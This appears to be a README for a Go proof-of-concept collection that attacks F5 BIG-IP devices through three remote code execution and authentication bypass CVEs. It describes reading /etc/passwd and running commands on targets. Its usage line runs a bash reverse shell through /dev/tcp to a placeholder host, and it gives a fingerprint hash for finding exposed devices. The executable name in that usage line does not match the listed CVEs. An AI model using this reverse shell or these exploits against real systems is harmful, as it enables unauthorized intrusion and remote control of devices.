
CVE-2020-5902 CVE-2021-22986 CVE-2022-1388 POC集合
Written in Go, a collection of POCs for CVE-2020-5902, CVE-2021-22986, CVE-2022-1388. Other F5 POCs will be added later.
author:160team.west9B
For use only by security researchers with authorization. Comply with cybersecurity laws. Any consequences are your own responsibility, and the author is not liable.
F5 POC collection:
CVE-2020-5902: F5 BIG-IP Remote Code Execution Vulnerability
CVE-2021-22986: F5 BIG-IP iControl REST Unauthorized Remote Command Execution Vulnerability
CVE-2022-1388: Authentication Bypass Remote Command Execution
CVE-2020-5902 verification uses arbitrary file download. If /etc/passwd is returned, the vulnerability exists.
CVE-2021-22986 and CVE-2022-1388 POCs execute the id command by default. If {id} is returned, the vulnerability exists. You can use -c to customize the command.
usage: ./cve-2022-30525.exe -m exp -u url -c bash -i >& /dev/tcp/xxxx/1377 0>&1

icon_hash="-335242539"